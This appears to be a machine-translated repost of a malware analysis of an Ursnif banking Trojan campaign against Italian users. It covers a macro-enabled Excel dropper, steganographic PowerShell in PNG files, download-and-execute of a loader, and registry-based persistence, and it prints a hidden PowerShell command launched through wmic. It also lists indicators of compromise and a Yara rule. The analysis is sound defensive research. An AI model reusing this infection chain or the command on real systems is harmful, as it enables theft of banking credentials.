Shulou(Shulou.com)05/31 Report--

Xiaobian to share with you for the Italian Ursnif bank Trojan example analysis, I believe most people do not know how to share this article for your reference, I hope you read this article after a great harvest, let us go to understand it together!

This article is limited to technical research and discussion, strictly prohibited for illegal use, otherwise all consequences arising from their own responsibility.

introduced

Recently, another wave of Ursnif attacks swept Italy!

Ursnif is currently the most active banking Trojan, also known as GOZI. In fact, it's a variant of the Gozi-ISFB banking Trojan, and since the Trojan leaked its source code in 2014, attackers have been upgrading and updating Gozi's functionality over the years. And in this variant, Ursnif also embeds an attack "weapon" against Office documents, a malicious VBA macro that can act as a Dropper or obfuscated PowerShell script to hide the real Payload. Ursnif also uses steganography to hide malicious code and avoid AV detection.

Of course, this variant also uses Queue UserAPC process injection technology to inject malicious code into explorer.exe, which is more stealthy because there is no need to create a remote thread in the target process.

technical analysis

The initial infection vector is presented as an Excel file that cannot be opened and requires the user to enable macros to view the contents of malicious documents, usually titled purchase orders or invoices, etc.

During our analysis of the sample, we extracted malicious macro code, which we found uses the Application.International MS Office attribute to check the user's country. If the country code returned is Italy (code 39), the malicious macro will use the Shell function to execute the next attack instruction:

The rest of the malicious macro's functions are used primarily to prepare Shell commands for execution and to splice and encode strings using various methods. The final command code contains a large number of binary strings that need to be converted into new PowerShell commands using the following functions:

[Convert]::ToInt16()-as[char]

As shown above, malware attempts to download an image from at least one or two embedded URLs:

https://images2.imgbox[.] com/55/c4/rBzwpAzi_o.pnghttps://i.postimg[.] cc/PH6QvFvF/mario.png? dl=1

This seemingly legitimate image actually contains new PowerShell commands, and the attacker used the Invoke-PSImage script to craft the malicious image, which is typically used to embed bytes or script code into pixels in PNG files.

Et voilà is another obfuscated PowerShell code, Payload is Base64 encoded, so it's easy to handle:

The code appears to be hexadecimal encoded and can be decoded using the previous [Convert]:: ToInt16 function.

The final code is as follows:

The code checks again to see if the user is in Italy, and the information is returned by the following command:

Get-Culture| Format-List -Property *

If the test results in false, the script retrieves the file from http://fillialopago[.] info/~ DF2F63 Download an EXE Payload, store it in %TEMP%\Twain001.exe and execute it.

During analysis, most antivirus software fails to detect malicious files:

The executable file is a typical Ursnif loader, which interacts with the background server and downloads malicious code that needs to be injected into the explorer.exe process. It uses the IWebBrowser.Navigate function to retrieve the file from its malicious server felipllet[.] info downloads malicious data where the URI path is forged into a video file (.avi).

The data in the server response is encrypted, as shown in the following figure:

After decryption, all useful data is stored in the following registry key:

HKCU\Software\AppDataLow\Software\Microsoft\{GUID}

The registry key "defrdisc" contains malicious commands that need to be executed next. After the target host is started, the commands will be executed automatically:

The main purpose of the command is to execute the data in the "cmiftall" registry key through the PowerShell engine:

C:\Windows\system32\wbem\wmic.exe/output:clipboard process call create "powershell -w hiddeniex([System.Text.Encoding]::ASCII.GetString((get-itemproperty'HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E').cmiftall))"

The data in the "cmiftall" registry key is a PowerShell script encoded in hexadecimal, so we can easily reconstruct what it does:

Ursnif uses PowerShell scripts to store malicious code in registry keys, and Ursnif can allocate space through its malicious byte array, which contains the final malicious Payload, and embed it into legitimate processes by calling QueueUserAPC and SleepEx.

Ursnif's complete working mechanism is shown below:

Intrusion Threat Indicator IoC hash: 630b6f15c770716268c539c5558152168004657beee740e73ee9966d6de1753f(old sample)f30454bcc7f1bc1f328b9b546f5906887fd0278c40d90ab75b8631ef18ed3b7f(new sample)93dd4d7baf1e89d024c59dbffce1c4cbc85774a1b7bcc8914452dc8aa8a79a78(final code) Dropurls： https://images2.imgbox[.] com/55/c4/rBzwpAzi_o.pnghttps://i.postimg[.] cc/PH6QvFvF/mario.png? dl=1https://fillialopago[.] info/~DF2F63http://felipllet[.] infoC&C：pereloplatka[.] hostroiboutique[.] ruuusisnfbfaa[.] xyznolavalt[.] icusendertips[.] ruIP： 185.158.248.142185.158.248.143 Attack component: HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4EYara rule import "pe"rule Ursnif_201902 {meta: description = "Yara rule for Ursnifloader - January version" author = "Yoroi - ZLab" last_updated = "2019-02-06" tlp = "white" category = "informational"strings: $a1 = "PADDINGXX" $a2 = { 66 66 66 66 66 66 66 }condition: all of ($a*) and pe.number_of_sections ==4 and (pe.version_info["OriginalFilename"] contains"Lumen.exe" or pe.version_info["OriginalFilename"] contains"PropositionReputation.exe") } I believe that everyone has a certain understanding, hope to share the content to help everyone, if you still want to learn more knowledge, welcome to pay attention to the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.